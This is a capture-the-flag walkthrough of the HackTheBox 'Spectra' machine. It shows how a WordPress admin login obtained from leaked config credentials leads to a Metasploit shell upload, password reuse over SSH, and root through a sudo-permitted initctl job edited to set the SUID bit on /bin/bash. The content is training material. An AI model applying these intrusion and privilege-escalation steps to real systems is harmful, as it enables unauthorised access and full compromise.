HackTheBox : Spectra Walkthrough
data:image/s3,"s3://crabby-images/ae128/ae12837de5815eaaf7f9ac80a58d4f3f0653278e" alt=""
Concepts Learnt :
- Enumeration
2. Database misconfiguration
3. Wordpress admin upload(metasploit)
4. Linux file system(Initctl)
Steps to Enumerate :
Run an Nmap Scan to find all the open ports!
Command : nmap 10.10.10.229 -A
10.10.10.229 IP of the Server
-A This options makes Nmap make an effort in identifying the target OS,services and the versions. It also does traceroute and applies NSE scripts to detect additional information.
-vv Defines level 2 verbosity for the scan
data:image/s3,"s3://crabby-images/83cab/83cab4cfd91ea5ffe33c0b642eccbbf933f84798" alt=""
We see that there are 3 ports open :
22/tcp- SSH port
80/tcp- HTTP port
3306/tcp — MySQL port
Lets check the http site on port 80:
data:image/s3,"s3://crabby-images/48d52/48d52913b30883b81896a353dd54b5122feab5b2" alt=""
A simple site with 2 links to the tracker site and Test, but we cannot load the site
We see a domain attached spectra.htb to these links, lets add it to the /etc/hosts folder.
Command : sudo nano etc/hosts
And add the following line
10.10.10.229 spectra.htb
data:image/s3,"s3://crabby-images/d8d25/d8d254b27fb322ea56397da76043ea58355786a6" alt=""
Now lets load the pages
Software issue tracker page is just a simple WordPress site :
data:image/s3,"s3://crabby-images/f3b97/f3b971b561008e3597efe4c61721a78a161258a3" alt=""
The test site shows an error establishing a database connection:
data:image/s3,"s3://crabby-images/870f5/870f5854ae9dfc3a6291ce118844a53abebf9956" alt=""
However, we can open the testing folder and explore it!
data:image/s3,"s3://crabby-images/4c796/4c79620be4427d1c06884796c19c01e402d83bdb" alt=""
Not many files, lets check the config file first..
Checking the wp-config.php.save file, we see some credentials!
We can find DB username and password!
data:image/s3,"s3://crabby-images/d1c27/d1c2736ee837bd63e803e0caeb8db7da5f7009dc" alt=""
Lets try and login into the WordPress using these credentials!
data:image/s3,"s3://crabby-images/45ade/45adecc91253f91923c9c052be8de1ebea687161" alt=""
Can’t login using the given username! Let’s test administrator and try again!
And we are in!!
data:image/s3,"s3://crabby-images/7aeb0/7aeb035da59c60b1f7af441048f81d575ce398d8" alt=""
Exploring around for possible escalation, I found out that there is a Metasploit admin shell upload we can use!
Let’s search Metasploit for admin shell upload!
To start Metasploit —
Command : msfconsole
data:image/s3,"s3://crabby-images/8f45f/8f45f93d0506ec39bf88845fea39c3c18d28df56" alt=""
Lets search for wp admin shell
Command : search wp_admin
Select the module 0
Command : use 0
Now lets see all the options!
data:image/s3,"s3://crabby-images/2bf74/2bf744b5c7db72769e1f540bff46d84eb7b97d1c" alt=""
We need to add in the password, username, rhosts and TargetURI!
Let’s add that in using set command!
Command : set (USERNAME/PASSWORD/RHOSTS/TargetURI)
The targetURI is the /main page!
You will also need to set the LHOSTS to your tun0 ip address
To check your tun0 ip
Command : ifconfig
And use the set command to add it!
data:image/s3,"s3://crabby-images/cf2de/cf2dec4e96d3e0a0a6220a119b176bd2bc8913b7" alt=""
Let’s execute it now!
Command : exploit
data:image/s3,"s3://crabby-images/180ce/180ced5e2c2313684c3dd7ab994640f73d11c72f" alt=""
And we get a meterpreter instance!
Lets remove meterpreter and get the shell!
Command : shell
data:image/s3,"s3://crabby-images/8b23b/8b23bbbb9fa4455936e8446fa95aaeb97c789578" alt=""
Checking the home directory we find 5 users
data:image/s3,"s3://crabby-images/657e0/657e07dd11d4448b39d1c40c58de29d2ff5305aa" alt=""
While checking katie’s folder we see that the user.txt our first flag is there however we don’t have the permission to check that!
Lets explore more!
While checking the /opt folder in root we see a autologin.conf.orig file! Lets check that out!
We can see there is a line suggesting read password from file, and has two directories listed — /mnt/stateful_partition/etc/autologin and /etc/autologin
data:image/s3,"s3://crabby-images/be55b/be55b2f1fffe59396b7f29007199a6f950937bd0" alt=""
Let’s check these files!
Checking the /etc/autologin folder we have passwd as a file!
Checking this file we have a possible password!
Lets try using ssh to login into katie as user and the found password!
data:image/s3,"s3://crabby-images/0bf1d/0bf1d117f342238f14f45a29418591108010450a" alt=""
And we are in!
data:image/s3,"s3://crabby-images/638da/638da1b4fdc96251dde535eb5968fafa7aa9aef9" alt=""
Lets check the user.txt for our first flag!
Command : cat user.txt
data:image/s3,"s3://crabby-images/14f26/14f266859057e3678eab40afd5221beb4bbe046d" alt=""
Let’s check the sudo privilege available for katie!
Command : sudo -l
We can see that we can run initctl as sudo without password.
data:image/s3,"s3://crabby-images/808b5/808b5e9b6716f20a99a46470158c4602aaf836b2" alt=""
Let’s check the init file system.
data:image/s3,"s3://crabby-images/b5b4d/b5b4db38500798f793f1755f6a5a01f0738e9e88" alt=""
Wow so many files!
We can see 10 test.conf files, lets check them out!
Checking the test.conf file we can see a script for testing node.js!
Let’s stop this script from running and try executing /bin/bash code to gain root access!
Command : sudo /sbin/initctl stop test
data:image/s3,"s3://crabby-images/d83c1/d83c130c405be038848d9d53a89d94c24e7d1414" alt=""
Command : nano test.conf
data:image/s3,"s3://crabby-images/01a4d/01a4d16c85aec3d25e369e91ec706ecc107ce9b5" alt=""
Now add the following line between the scripts
chmod +s /bin/bash
Now run the script!
Command : sudo /sbin/initctl start test
Now lets run the command for /bin/bash and check if we have root access!
Command : /bin/bash -p
data:image/s3,"s3://crabby-images/2d361/2d3610a88e417526b4af6535e1e71e27d691c618" alt=""
And we are in!
Command : whoami
data:image/s3,"s3://crabby-images/091cd/091cd1fb1d3351536918094d9065e051818df183" alt=""
Checking the root folder we get our second flag in root.txt!
Command : cd /root
Command : cat root.txt
data:image/s3,"s3://crabby-images/976dd/976dd3b27935edd316991c2d901325d830aeef55" alt=""
This was a fun room to work on. Hope you enjoyed!
Comments
Post a Comment